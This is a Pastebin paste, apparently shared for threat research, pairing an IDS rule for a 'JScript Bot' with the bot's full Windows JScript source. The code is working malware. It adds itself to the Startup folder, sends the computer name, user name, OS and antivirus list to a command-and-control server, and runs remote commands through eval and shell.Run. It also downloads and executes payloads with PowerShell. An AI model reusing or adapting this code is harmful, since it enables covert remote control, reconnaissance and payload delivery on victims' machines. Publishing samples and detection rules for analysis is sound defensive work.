SHARE
TWEET

Jscript Bot

James_inthe_box Jan 6th, 2019 505 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. alert tcp $HOME_NET any -> $EXTERNAL_NET !$HTTP_PORTS (msg:"JScript Bot Initial Checkin"; flow:established,to_server; content:"POST"; http_method; content:"User-Agent|3a| xmsSofts_1.0.0_"; content:"Content-Length|3a 20|0"; http_header; classtype:trojan-activity; sid:20166280; rev:1; metadata:created_at 2019_01_06;)
  2.  
  3. var shell = new ActiveXObject('WScript.Shell');
  4. var fstym = new ActiveXObject('Scripting.FileSystemObject');
  5. var spl = '|V|';
  6. var Ch = '\\';
  7. var VN = 'xmsSofts_1.0.0' + '_' + getSerial();
  8. var Startup = getEnv('appdata') + '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
  9. var StartupAll = getEnv('allusersprofile') + '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
  10. var Temp = getEnv('temp') + '\\';
  11. var fxDmE4zu = WScript.ScriptFullName;
  12. var wn = WScript.ScriptName;
  13. var UDex;
  14. var DeLay = 20;
  15. ModinySks();
  16. do {
  17.     try {
  18.         var send = SendHttp();
  19.         var Command = send.split(spl);
  20.         var order = Command[0];
  21.         var order_data = Command[1];
  22.         if (order === 'Ex') {
  23.             eval(order_data);
  24.         }
  25.         if (order === 'Cmd') {
  26.             shell.Run(order_data, 0, false);
  27.         }
  28.         if (order === 'DwnlExe') {
  29.             var path = Temp + Command[2];
  30.             shell.Run("powershell.exe $WebClient =New-Object System.Net.WebClient;$WebClient.AllowAutoRedirect=true;$WebClient.DownloadFile('" + Command[1] + "','" + path + "')", 0, false);
  31.             WScript.Sleep(DeLay * 1000);
  32.             shell.Run('powershell.exe start ' + path, 0, false);
  33.         }
  34.         if (order === 'SelfRemove') {
  35.             shell.Run("powershell.exe del '" + Startup + wn + "'", 0, false);
  36.             shell.Run("powershell.exe del '" + fxDmE4zu + "'", 0, false);
  37.             WScript.Quit(1);
  38.         }
  39.         if (order === 'UpdateS') {
  40.             var path = Temp + Command[2];
  41.             shell.Run("powershell.exe $WebClient =New-Object System.Net.WebClient;$WebClient.AllowAutoRedirect=true;$WebClient.DownloadFile('" + Command[1] + "','" + path + "')", 0, true);
  42.             if (fstym.fileexists(path)) {
  43.                 shell.Run("powershell.exe del '" + Startup + wn + "'", 0, false);
  44.                 shell.Run("powershell.exe del '" + fxDmE4zu + "'", 0, false);
  45.                 WScript.Sleep(DeLay * 1000);
  46.                 shell.Run("powershell.exe start '" + path + "'", 0, false);
  47.                 WScript.Quit(1);
  48.             }
  49.         }
  50.     } catch (err) {
  51.         util_log('>>> Silencing catch ' + _inspect(err));
  52.     }
  53.     WScript.Sleep(5000);
  54. } while (true);
  55. function SendHttp(R) {
  56.     var X = new ActiveXObject('Microsoft.XMLHTTP');
  57.     X.open('POST', 'http://micro-soft-updates.ga:8880/connect', false);
  58.     var useragent = getUserAgent();
  59.     X.SetRequestHeader('User-Agent:', useragent);
  60.     X.send(R);
  61.     return X.responsetext;
  62. }
  63. function getUserAgent() {
  64.     var s, NT, i;
  65.     if (fstym.fileexists(getEnv('Windir') + '\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe')) {
  66.         NT = 'YES';
  67.     } else {
  68.         NT = 'NO';
  69.     }
  70.     s = VN + Ch + jsUcfirst(getEnv('COMPUTERNAME')) + Ch + jsUcfirst(getEnv('USERNAME')) + Ch + jsUcfirst(getSystem() + '[' + getOSVer() + ']') + Ch + jsUcfirst(getAntiV()) + Ch + NT + Ch + UDex + Ch;
  71.     return s;
  72. }
  73. function getEnv(S) {
  74.     return shell.ExpandEnvironmentStrings('%' + S + '%');
  75. }
  76. function getSerial() {
  77.     var s;
  78.     s = GetObject('winmgmts:').InstancesOf('win32_logicaldisk');
  79.     var en = new Enumerator(s);
  80.     for (; !en.atEnd(); en.moveNext()) {
  81.         var it = en.item();
  82.         return it.volumeserialnumber;
  83.         break;
  84.     }
  85. }
  86. function getSystem() {
  87.     var s = GetObject('winmgmts:').InstancesOf('Win32_OperatingSystem');
  88.     var en = new Enumerator(s);
  89.     for (; !en.atEnd(); en.moveNext()) {
  90.         var it = en.item();
  91.         return it.Caption;
  92.         break;
  93.     }
  94. }
  95. function getOSVer() {
  96.     return GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth;
  97. }
  98. function getAntiV() {
  99.     var s;
  100.     var finalx = [];
  101.     var wmg = 'winmgmts:\\\\localhost\\root\\securitycenter';
  102.     try {
  103.         s = GetObject(wmg).InstancesOf('AntiVirusProduct');
  104.         var en = new Enumerator(s);
  105.         for (; !en.atEnd(); en.moveNext()) {
  106.             var it = en.item();
  107.             var str = it.DisplayName;
  108.             finalx.push(str);
  109.         }
  110.     } catch (e) {
  111.         util_log('>>> Silencing catch ' + _inspect(e));
  112.     }
  113.     if (str !== '') {
  114.         wmg = wmg + '2';
  115.         try {
  116.             s = GetObject(wmg).InstancesOf('AntiVirusProduct');
  117.             en = new Enumerator(s);
  118.             for (; !en.atEnd(); en.moveNext()) {
  119.                 it = en.item();
  120.                 var str = it.DisplayName;
  121.                 finalx.push(str);
  122.             }
  123.         } catch (e) {
  124.             util_log('>>> Silencing catch ' + _inspect(e));
  125.         }
  126.     } else {
  127.     }
  128.     var finalxsrt = finalx.join(' , ');
  129.     return finalxsrt;
  130. }
  131. function ModinySks() {
  132.     try {
  133.         shell.Run("powershell.exe Copy-Item -Path '" + fxDmE4zu + "' -Destination '" + Startup + wn + "'", 0, false);
  134.     } catch (err) {
  135.         util_log('>>> Silencing catch ' + _inspect(err));
  136.     }
  137. }
  138. function jsUcfirst(string) {
  139.     var strx = string.charAt(0).toUpperCase() + string.slice(1);
  140.     strx = strx.replace('\\', '');
  141.     return strx;
  142. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top